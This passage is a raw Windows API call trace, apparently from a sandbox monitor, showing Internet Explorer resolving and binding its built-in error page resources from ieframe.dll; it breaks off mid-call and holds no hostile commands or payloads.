[0159.386] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.386] StrChrW (lpStart="defer", wMatch=0x3a) returned 0x0 [0159.386] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.386] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.386] StrChrW (lpStart="src", wMatch=0x3a) returned 0x0 [0159.387] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6d8e68 [0159.388] StrChrW (lpStart="LANGUAGE", wMatch=0x3a) returned 0x0 [0159.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6d8cc8 [0159.388] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.388] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.388] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x800) returned 0x6de7c8 [0159.388] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x6b65c8 [0159.388] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x19a0f4 | out: ppu=0x19a0f4) returned 0x0 [0159.388] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.389] IUnknown:AddRef (This=0x68e1fc) returned 0x6 [0159.389] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.389] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x19a0a0, dwFlags=0x0 | out: pdwZone=0x19a0a0*=0xffffffff) returned 0x800c0011 [0159.389] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.389] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.389] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.389] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x1400, pPolicy=0x19a0a4, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19a084 | out: pPolicy=0x19a0a4*=0x0, pdwOutFlags=0x19a084*=0x0) returned 0x0 [0159.389] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x1400, pPolicy=0x19a0a4, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19a0a4*=0x0) returned 0x0 [0159.389] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.389] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.389] IUnknown:Release (This=0x68e1fc) returned 0x5 [0159.389] CreateUri (in: pwzURI="error.js", dwFlags=0x3002b85, dwReserved=0x0, ppURI=0x19a09c | out: ppURI=0x19a09c*=0x68eabc) returned 0x0 [0159.389] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x199ed8 | out: ppu=0x199ed8) returned 0x0 [0159.389] IUnknown:AddRef (This=0x68e1fc) returned 0x6 [0159.390] IUnknown:QueryInterface (in: This=0x68e1fc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199f34 | out: ppvObject=0x199f34*=0x68e1fc) returned 0x0 [0159.390] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.390] IUnknown:AddRef (This=0x68e1fc) returned 0x7 [0159.390] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.391] GetProcAddress (hModule=0x703b0000, lpProcName="CoInternetCombineIUri") returned 0x703e98d0 [0159.391] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x199ec4 | out: lpflOldProtect=0x199ec4*=0x4) returned 1 [0159.392] CoInternetCombineIUri (in: pBaseUri=0x68e1fc, pRelativeUri=0x68eabc, dwCombineFlags=0x6000000, ppCombinedUri=0x199fb8, dwReserved=0x0 | out: ppCombinedUri=0x199fb8*=0x68dcbc) returned 0x0 [0159.392] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.393] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x198940 | out: ppvObject=0x198940*=0x6e784f9c) returned 0x0 [0159.393] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.393] IInternetProtocolInfo:CombineUrl (in: This=0x6e784f9c, pwzBaseUrl="res://ieframe.dll/error.dlg", pwzRelativeUrl="error.js", dwCombineFlags=0x6000000, pwzResult=0x198e1c, cchResult=0x825, pcchResult=0x198e04, dwReserved=0x0 | out: pwzResult="", pcchResult=0x198e04*=0x0) returned 0x800c0011 [0159.393] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.393] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.393] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.393] IUri:GetScheme (in: This=0x68dcbc, pdwScheme=0x199fd8 | out: pdwScheme=0x199fd8*=0x12) returned 0x0 [0159.394] IUnknown:QueryInterface (in: This=0x68dcbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199ed4 | out: ppvObject=0x199ed4*=0x68dcbc) returned 0x0 [0159.394] IUnknown:Release (This=0x68dcbc) returned 0x2 [0159.394] IUnknown:AddRef (This=0x68dcbc) returned 0x3 [0159.394] IUri:GetAbsoluteUri (in: This=0x68dcbc, pbstrAbsoluteUri=0x199ed0 | out: pbstrAbsoluteUri=0x199ed0*="res://ieframe.dll/error.js") returned 0x0 [0159.394] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.395] malloc (_Size=0xb0) returned 0xc50f80 [0159.395] IUnknown:AddRef (This=0x68dcbc) returned 0x4 [0159.395] IUri:GetSchemeName (in: This=0x68dcbc, pbstrSchemeName=0x199e9c | out: pbstrSchemeName=0x199e9c*="res") returned 0x0 [0159.395] IUnknown:QueryInterface (in: This=0x68dcbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199e94 | out: ppvObject=0x199e94*=0x68dcbc) returned 0x0 [0159.396] IUnknown:Release (This=0x68dcbc) returned 0x4 [0159.396] IUnknown:AddRef (This=0x68dcbc) returned 0x5 [0159.396] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.396] IUnknown:Release (This=0x68dcbc) returned 0x4 [0159.396] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.396] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.397] IInternetSecurityManager:MapUrlToZone (in: This=0x5f0200, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199ef0, dwFlags=0x0 | out: pdwZone=0x199ef0*=0x0) returned 0x0 [0159.398] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.398] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6b5be0 [0159.398] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x199bb4, dwReserved=0x0 | out: ppSM=0x199bb4*=0x6cdc88) returned 0x0 [0159.398] IUnknown:QueryInterface (in: This=0x6cdc88, riid=0x6d734ed8*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x199bb8 | out: ppvObject=0x199bb8*=0x6cdc88) returned 0x0 [0159.398] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6d8c28 [0159.399] IInternetSecurityManager:SetSecuritySite (This=0x6cdc88, pSite=0x6d8c2c) returned 0x0 [0159.399] IUnknown:AddRef (This=0x6d8c2c) returned 0x2 [0159.399] IUnknown:QueryInterface (in: This=0x6d8c2c, riid=0x703b4814*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x199b8c | out: ppvObject=0x199b8c*=0x6d8c28) returned 0x0 [0159.399] IServiceProvider:QueryService (in: This=0x6d8c28, guidService=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), riid=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), ppvObject=0x6cdcbc | out: ppvObject=0x6cdcbc*=0x0) returned 0x80004002 [0159.399] IServiceProvider:QueryService (in: This=0x6d8c28, guidService=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x6cdcb8 | out: ppvObject=0x6cdcb8*=0x6d8c30) returned 0x0 [0159.399] IUnknown:Release (This=0x6d8c28) returned 0x3 [0159.399] IUnknown:AddRef (This=0x6cdc88) returned 0x3 [0159.399] IUnknown:Release (This=0x6cdc88) returned 0x2 [0159.399] IUnknown:Release (This=0x6cdc88) returned 0x1 [0159.399] IUnknown:QueryInterface (in: This=0x68dcbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199bb4 | out: ppvObject=0x199bb4*=0x68dcbc) returned 0x0 [0159.400] IUnknown:Release (This=0x68dcbc) returned 0x4 [0159.400] IUnknown:AddRef (This=0x68dcbc) returned 0x5 [0159.400] ParseURLW (in: pcszURL="res://ieframe.dll/error.js", ppu=0x199b88 | out: ppu=0x199b88) returned 0x0 [0159.400] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.400] SysStringLen (param_1="res://ieframe.dll/error.js") returned 0x1a [0159.400] QueryPerformanceCounter (in: lpPerformanceCount=0x199b30 | out: lpPerformanceCount=0x199b30*=3097821924396) returned 1 [0159.400] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19960c | out: ppvObject=0x19960c*=0x68e73c) returned 0x0 [0159.401] IUnknown:Release (This=0x68e73c) returned 0xf [0159.401] IUnknown:AddRef (This=0x68e73c) returned 0x10 [0159.401] IUnknown:Release (This=0x68e73c) returned 0xf [0159.401] IUnknown:QueryInterface (in: This=0x68dcbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19960c | out: ppvObject=0x19960c*=0x68dcbc) returned 0x0 [0159.402] IUnknown:Release (This=0x68dcbc) returned 0x5 [0159.402] IUnknown:AddRef (This=0x68dcbc) returned 0x6 [0159.402] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.402] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x198940 | out: ppvObject=0x198940*=0x6e784f9c) returned 0x0 [0159.402] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.402] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.js", ParseAction=3, dwParseFlags=0x0, pwzResult=0x6c8918, cchResult=0x1b, pcchResult=0x198950, dwReserved=0x0 | out: pwzResult="", pcchResult=0x198950*=0x27) returned 0x1 [0159.402] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.402] CreateUri (in: pwzURI="res://ieframe.dll/error.js", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x1948bc | out: ppURI=0x1948bc*=0x9ee0cc4) returned 0x0 [0159.402] IUri:GetHost (in: This=0x9ee0cc4, pbstrHost=0x1948c0 | out: pbstrHost=0x1948c0*="ieframe.dll") returned 0x0 [0159.402] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x1948c8, cchResult=0x1000, pcchResult=0x1948b0, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x1948b0) returned 0x0 [0159.402] SysReAllocString (in: pbstr=0x1948c0*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x1948c0*="ieframe.dll") returned 1 [0159.402] IUri:GetPath (in: This=0x9ee0cc4, pbstrPath=0x1948c4 | out: pbstrPath=0x1948c4*="/error.js") returned 0x0 [0159.402] CoInternetParseUrl (in: pwzUrl="/error.js", ParseAction=0x13, dwFlags=0x0, pszResult=0x1948c8, cchResult=0x1000, pcchResult=0x1948b0, dwReserved=0x0 | out: pszResult="/error.js", pcchResult=0x1948b0) returned 0x0 [0159.403] SysReAllocString (in: pbstr=0x1948c4*="/error.js", psz="/error.js" | out: pbstr=0x1948c4*="/error.js") returned 1 [0159.403] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6b5cf8 [0159.403] IUnknown:Release (This=0x9ee0cc4) returned 0x5 [0159.404] SearchPathW (in: lpPath=0x0, lpFileName="ieframe.dll", lpExtension=0x0, nBufferLength=0x1000, lpBuffer=0x1968fc, lpFilePart=0x1968f4 | out: lpBuffer="C:\\Windows\\SysWOW64\\ieframe.dll", lpFilePart=0x1968f4*="ieframe.dll") returned 0x1f [0159.404] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5cf8 | out: hHeap=0x5e0000) returned 1 [0159.404] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.404] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.404] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1988fc | out: ppvObject=0x1988fc*=0x6e784f9c) returned 0x0 [0159.404] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.404] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.js", ParseAction=3, dwParseFlags=0x0, pwzResult=0x68d3e8, cchResult=0x27, pcchResult=0x198950, dwReserved=0x0 | out: pwzResult="file://C:\\Windows\\SysWOW64\\ieframe.dll", pcchResult=0x198950*=0x27) returned 0x0 [0159.405] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.405] CreateUri (in: pwzURI="res://ieframe.dll/error.js", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x194884 | out: ppURI=0x194884*=0x9ee0cc4) returned 0x0 [0159.405] IUri:GetHost (in: This=0x9ee0cc4, pbstrHost=0x194888 | out: pbstrHost=0x194888*="ieframe.dll") returned 0x0 [0159.405] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x194890, cchResult=0x1000, pcchResult=0x194878, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x194878) returned 0x0 [0159.405] SysReAllocString (in: pbstr=0x194888*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x194888*="ieframe.dll") returned 1 [0159.405] IUri:GetPath (in: This=0x9ee0cc4, pbstrPath=0x19488c | out: pbstrPath=0x19488c*="/error.js") returned 0x0 [0159.405] CoInternetParseUrl (in: pwzUrl="/error.js", ParseAction=0x13, dwFlags=0x0, pszResult=0x194890, cchResult=0x1000, pcchResult=0x194878, dwReserved=0x0 | out: pszResult="/error.js", pcchResult=0x194878) returned 0x0 [0159.405] SysReAllocString (in: pbstr=0x19488c*="/error.js", psz="/error.js" | out: pbstr=0x19488c*="/error.js") returned 1 [0159.405] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x64cf68 [0159.405] IUnknown:Release (This=0x9ee0cc4) returned 0x5 [0159.405] SearchPathW (in: lpPath=0x0, lpFileName="ieframe.dll", lpExtension=0x0, nBufferLength=0x1000, lpBuffer=0x1968c4, lpFilePart=0x1968bc | out: lpBuffer="C:\\Windows\\SysWOW64\\ieframe.dll", lpFilePart=0x1968bc*="ieframe.dll") returned 0x1f [0159.406] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64cf68 | out: hHeap=0x5e0000) returned 1 [0159.406] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.407] IUnknown:Release (This=0x68dcbc) returned 0x5 [0159.407] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.407] IUnknown:AddRef (This=0x68dcbc) returned 0x6 [0159.407] IUnknown:AddRef (This=0x68dcbc) returned 0x7 [0159.407] IUnknown:QueryInterface (in: This=0x68dcbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199b98 | out: ppvObject=0x199b98*=0x68dcbc) returned 0x0 [0159.408] IUnknown:Release (This=0x68dcbc) returned 0x7 [0159.408] IUnknown:AddRef (This=0x68dcbc) returned 0x8 [0159.408] IUri:GetScheme (in: This=0x68dcbc, pdwScheme=0xd44698 | out: pdwScheme=0xd44698*=0x12) returned 0x0 [0159.408] IUri:GetSchemeName (in: This=0x68dcbc, pbstrSchemeName=0x199b7c | out: pbstrSchemeName=0x199b7c*="res") returned 0x0 [0159.408] _wcsnicmp (_String1="res", _String2="data", _MaxCount=0x5) returned 14 [0159.408] IUri:GetScheme (in: This=0x68dcbc, pdwScheme=0x199bbc | out: pdwScheme=0x199bbc*=0x12) returned 0x0 [0159.408] IUri:GetScheme (in: This=0x68dcbc, pdwScheme=0x199bbc | out: pdwScheme=0x199bbc*=0x12) returned 0x0 [0159.408] IUnknown:QueryInterface (in: This=0x68dcbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199bb4 | out: ppvObject=0x199bb4*=0x68dcbc) returned 0x0 [0159.408] IUnknown:Release (This=0x68dcbc) returned 0x8 [0159.409] IUnknown:AddRef (This=0x68dcbc) returned 0x9 [0159.409] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.410] GetProcAddress (hModule=0x703b0000, lpProcName="CreateURLMonikerEx2") returned 0x704167b0 [0159.410] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x199b48 | out: lpflOldProtect=0x199b48*=0x4) returned 1 [0159.411] CreateURLMonikerEx2 (in: pMkCtx=0x0, pUri=0x68dcbc, ppmk=0x199c18*=0x0, dwFlags=0x1 | out: ppmk=0x199c18*=0x6c8858) returned 0x0 [0159.411] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.411] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199814 | out: ppvObject=0x199814*=0x6e784f9c) returned 0x0 [0159.411] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.411] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.js", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x6db7a8, cchResult=0x824, pcchResult=0x199b2c, dwReserved=0x0 | out: pwzResult="", pcchResult=0x199b2c*=0x0) returned 0x800c0011 [0159.411] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.411] GetCurrentThreadId () returned 0xb48 [0159.411] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.412] GetProcAddress (hModule=0x76b10000, lpProcName="CreateBindCtx") returned 0x76b3ba10 [0159.413] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x199b50 | out: lpflOldProtect=0x199b50*=0x4) returned 1 [0159.413] CreateBindCtx (in: reserved=0x0, ppbc=0x199c10 | out: ppbc=0x199c10*=0x6c8898) returned 0x0 [0159.414] IUnknown:AddRef (This=0x6c8898) returned 0x2 [0159.414] IUnknown:AddRef (This=0x6c8898) returned 0x3 [0159.414] IUnknown:Release (This=0x6c8898) returned 0x2 [0159.414] IUnknown:Release (This=0x6c8898) returned 0x1 [0159.414] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x34) returned 0x6c88d8 [0159.414] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.414] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x34) returned 0x6c8918 [0159.415] IBindCtx:RegisterObjectParam (This=0x6c8898, pszKey="WillUseIntermediateCode", punk=0xd0eb20) returned 0x0 [0159.415] IUnknown:AddRef (This=0xd0eb20) returned 0x2 [0159.415] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6c88d8 | out: hHeap=0x5e0000) returned 1 [0159.415] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3a) returned 0x6db430 [0159.415] IUnknown:AddRef (This=0x6c8898) returned 0x2 [0159.415] RegisterBindStatusCallback (in: pBC=0x6c8898, pBSCb=0xd44510, ppBSCBPrev=0x0, dwReserved=0x0 | out: ppBSCBPrev=0x0) returned 0x0 [0159.416] IUnknown:AddRef (This=0xd44510) returned 0x3 [0159.416] IUnknown:QueryInterface (in: This=0xd44510, riid=0x703b4814*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x199b30 | out: ppvObject=0x199b30*=0xd44518) returned 0x0 [0159.416] IMoniker:RemoteBindToStorage (in: This=0x6c8858, pbc=0x6c8898, pmkToLeft=0x0, riid=0x6d6f62cc, ppvObj=0x199ba0 | out: ppvObj=0x199ba0*=0x9ef3890) returned 0x0 [0159.416] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.416] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19978c | out: ppvObject=0x19978c*=0x6e784f9c) returned 0x0 [0159.416] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.416] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.js", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x6db7a8, cchResult=0x824, pcchResult=0x199aa0, dwReserved=0x0 | out: pwzResult="", pcchResult=0x199aa0*=0x0) returned 0x800c0011 [0159.416] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.416] IUnknown:QueryInterface (in: This=0xd44510, riid=0x703b4e24*(Data1=0xaaa74ef9, Data2=0x8ee7, Data3=0x4659, Data4=([0]=0x88, [1]=0xd9, [2]=0xf8, [3]=0xc5, [4]=0x4, [5]=0xda, [6]=0x73, [7]=0xcc)), ppvObject=0x199a60 | out: ppvObject=0x199a60*=0xd44510) returned 0x0 [0159.417] IBindStatusCallbackEx:RemoteGetBindInfoEx (in: This=0xd44510, grfBINDF=0x6cb560, pbindinfo=0x6cb624, pstgmed=0x6cb564, grfBINDF2=0x199abc, pdwReserved=0x6cb624 | out: grfBINDF=0x6cb560*=0x83, pbindinfo=0x6cb624, pstgmed=0x6cb564, grfBINDF2=0x199abc*=0x0, pdwReserved=0x6cb624*=0x54) returned 0x0 [0159.417] IUnknown:Release (This=0xd44510) returned 0x4 [0159.417] IUnknown:QueryInterface (in: This=0xd44510, riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1999e0 | out: ppvObject=0x1999e0*=0x0) returned 0x80004002 [0159.417] IServiceProvider:QueryService (in: This=0xd44518, guidService=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1999e0 | out: ppvObject=0x1999e0*=0x0) returned 0x80004002 [0159.417] GetCurrentThreadId () returned 0xb48 [0159.417] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.417] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.418] IBindStatusCallback:OnStartBinding (This=0xd44510, dwReserved=0xff, pib=0x6cb500) returned 0x0 [0159.418] IUnknown:AddRef (This=0x6cb500) returned 0x2 [0159.418] IUnknown:QueryInterface (in: This=0x6cb500, riid=0x6d6f6148*(Data1=0xeb5cda44, Data2=0x5086, Data3=0x44fe, Data4=([0]=0xa9, [1]=0xb1, [2]=0xc6, [3]=0x42, [4]=0x13, [5]=0x53, [6]=0xa5, [7]=0x46)), ppvObject=0x199a3c | out: ppvObject=0x199a3c*=0x6cb530) returned 0x0 [0159.418] IUnknown:Release (This=0x6cb530) returned 0x2 [0159.418] IUnknown:QueryInterface (in: This=0xd44510, riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1994f8 | out: ppvObject=0x1994f8*=0x0) returned 0x80004002 [0159.418] IServiceProvider:QueryService (in: This=0xd44518, guidService=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1994f8 | out: ppvObject=0x1994f8*=0x0) returned 0x80004002 [0159.418] GetCurrentThreadId () returned 0xb48 [0159.418] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.418] IClassFactory:CreateInstance (in: This=0x6e784f90, pUnkOuter=0x9ef1630, riid=0x703b4c08*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x9ef166c | out: 